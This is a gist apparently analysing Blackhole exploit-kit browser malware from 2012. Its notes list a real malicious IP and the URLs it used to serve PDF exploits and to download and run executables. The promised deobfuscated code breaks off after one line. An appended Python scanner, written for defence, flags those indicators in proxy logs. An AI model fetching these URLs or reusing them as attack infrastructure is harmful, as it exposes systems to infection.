
# CapCap/malware.html.js forked from scottschiller/malware.html Created Feb 28, 2012

Browser malware found in the wild, 02/28/2012, deobf version
```js
/*
 Hello from upgradeyour.com (coming soon). I've done some security work in the past and figured
 this would be a fun and quick puzzle. I found the same hash as Scott on
 http://50.116.17.63/stats/counter.php?id=547b373f97233059 and googling it led to his post :)

 It tries to identify browser/OS version, and possibly run a WMP exploit. It also tries to visit
 http://50.116.17.63/stats/w.php?f=b6863&e=4 and http://50.116.17.63/stats/w.php?f=b6863&e=1
 and download+exec two different exes.

 It tries a PDF exploit ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188 and also
 http://50.116.17.63/stats/content/ap2.php?f=b6863 and http://50.116.17.63/content/ap1.php?f=b6863 ),
 an HCP exploit as well ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885 ), and some
 PDF exploit.

 This is all part of the Blackhole exploit kit, and this botnet is seemingly huge!

 Scott's post is below, and after it is the deobfuscated eval and shellcode it tries to run.
*/
/* ------------------------------------------------------ */
/* ------------------------------------------------------ */
/* ------------- Deobfuscated Code Below ---------------- */
/* ------------------------------------------------------ */
document.write('
```
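The notes above name a fixed set of network indicators for this Blackhole kit sample: one host, a stats counter, two exploit-serving paths (`ap1.php`/`ap2.php`) and a payload downloader (`w.php` with `f` and `e` parameters). As an added example that is not part of the gist or its author's notes, the Python below turns those indicators into a small proxy-log scanner: it classifies each request, groups hits per client so the counter → exploit → payload chain is visible, and flags clients that reached the payload stage. The log format is a constructed squid-style one (timestamp, client IP, method, URL) and the sample lines are constructed; the host and path patterns are taken from the notes.

```python
import re
from urllib.parse import urlparse, parse_qs

# Indicators taken from the gist notes (Blackhole exploit kit sample, Feb 2012).
KIT_HOST = "50.116.17.63"

# Path patterns observed in the sample, matched against the URL path only.
KIT_PATHS = {
    "stats-counter": re.compile(r"^/stats/counter\.php$"),
    "pdf-exploit": re.compile(r"^/(stats/)?content/ap[12]\.php$"),
    "payload-download": re.compile(r"^/stats/w\.php$"),
}

# Constructed sample log in a squid-like format: timestamp, client, method, URL.
SAMPLE_LOG = """\
1330387200.123 10.0.0.5 GET http://example.com/index.html
1330387201.456 10.0.0.5 GET http://50.116.17.63/stats/counter.php?id=547b373f97233059
1330387202.789 10.0.0.5 GET http://50.116.17.63/stats/content/ap2.php?f=b6863
1330387203.012 10.0.0.5 GET http://50.116.17.63/stats/w.php?f=b6863&e=4
1330387203.500 10.0.0.5 GET http://50.116.17.63/stats/w.php?f=b6863&e=1
1330387204.000 10.0.0.7 GET http://example.org/about
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)$")


def classify_url(url):
    """Return an indicator label if the URL is on the kit host, else None.

    Requests to the kit host whose path is not one of the known patterns still
    get a label ("kit-host-other") so that new paths on a known-bad host surface.
    """
    parsed = urlparse(url)
    if parsed.hostname != KIT_HOST:
        return None
    for label, pattern in KIT_PATHS.items():
        if pattern.match(parsed.path):
            return label
    return "kit-host-other"


def scan_log(text):
    """Return a list of hits: client, indicator label, URL and parsed query parameters."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the constructed format
        label = classify_url(m["url"])
        if label is None:
            continue
        # Keep the query parameters: for w.php the "f" campaign id and "e" variant
        # number distinguish the two executables the notes mention.
        params = {k: v[0] for k, v in parse_qs(urlparse(m["url"]).query).items()}
        hits.append({"client": m["client"], "label": label, "url": m["url"], "params": params})
    return hits


def summarize(hits):
    """Group indicator labels per client, in log order, to expose the infection chain."""
    chains = {}
    for h in hits:
        chains.setdefault(h["client"], []).append(h["label"])
    return chains


def likely_compromised(chains):
    """Clients that reached the payload stage, i.e. an exploit stage most likely succeeded."""
    return sorted(c for c, labels in chains.items() if "payload-download" in labels)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["client"], h["label"], h["params"])
    print("likely compromised:", likely_compromised(summarize(found)))
```

The chain view is the useful part for response: a client that only hit `counter.php` was fingerprinted, one that also hit `ap2.php` was served an exploit, and one that went on to `w.php` almost certainly ran the dropped executable and should be isolated and imaged rather than merely cleaned.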